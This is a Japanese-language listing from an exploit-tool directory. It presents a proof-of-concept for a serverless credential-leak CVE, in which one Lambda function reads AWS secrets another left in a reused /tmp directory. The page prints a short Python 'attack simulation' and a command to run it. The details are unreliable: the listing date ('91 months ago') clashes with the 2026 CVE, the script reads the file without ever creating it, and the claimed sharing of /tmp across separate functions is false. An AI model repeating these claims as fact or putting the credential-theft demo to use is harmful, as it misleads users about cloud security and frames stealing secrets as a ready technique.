Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
クラウドインフラストラクチャセキュリティ脆弱性分析エクスプロイトサーバーレスセキュリティデータ流出クラウドセキュリティ学習と教育
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

CVE-2026-21002 サーバーレスのコールドスタート時の認証情報漏洩に対する PoC エクスプロイト。再利用された Lambda の /tmp ディレクトリが AWS のシークレットを他の関数に露出させる仕組みを実証します。

リポジトリを見る
91ヶ月前未レビュー

CVE-2026-21002 – 再利用された /tmp を介したサーバーレスコールドスタート資格情報漏えい

プログラムコード(Python AWS Lambda シミュレーション)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – サーバーレスコールドスタートにおける資格情報漏えい

Severity: Critical

概要

サーバーレスプラットフォームは、関数の呼び出し間だけでなく、同じアカウントの異なる関数間でも実行環境(/tmp を含む)を再利用します。攻撃者の関数は、コールドスタート後に別の関数が /tmp に残した機密ファイルを読み取ることができ、資格情報の窃取につながります。

脆弱性の詳細

  • 種別: 情報開示 / 関数間情報漏えい
  • 影響: 資格情報の侵害、ラテラルムーブメント(横展開)
  • 根本原因: /tmp ディレクトリがウォームコンテナ間で共有されており、関数間の分離が行われていません。

エクスプロイトのデモンストレーション

シミュレーションを実行してください:

root@kitploit:~
python lambda_func_sim.py

攻撃者は、被害者の関数が残した AWS_SECRET_ACCESS_KEY を読み取ります。

ツールをダウンロード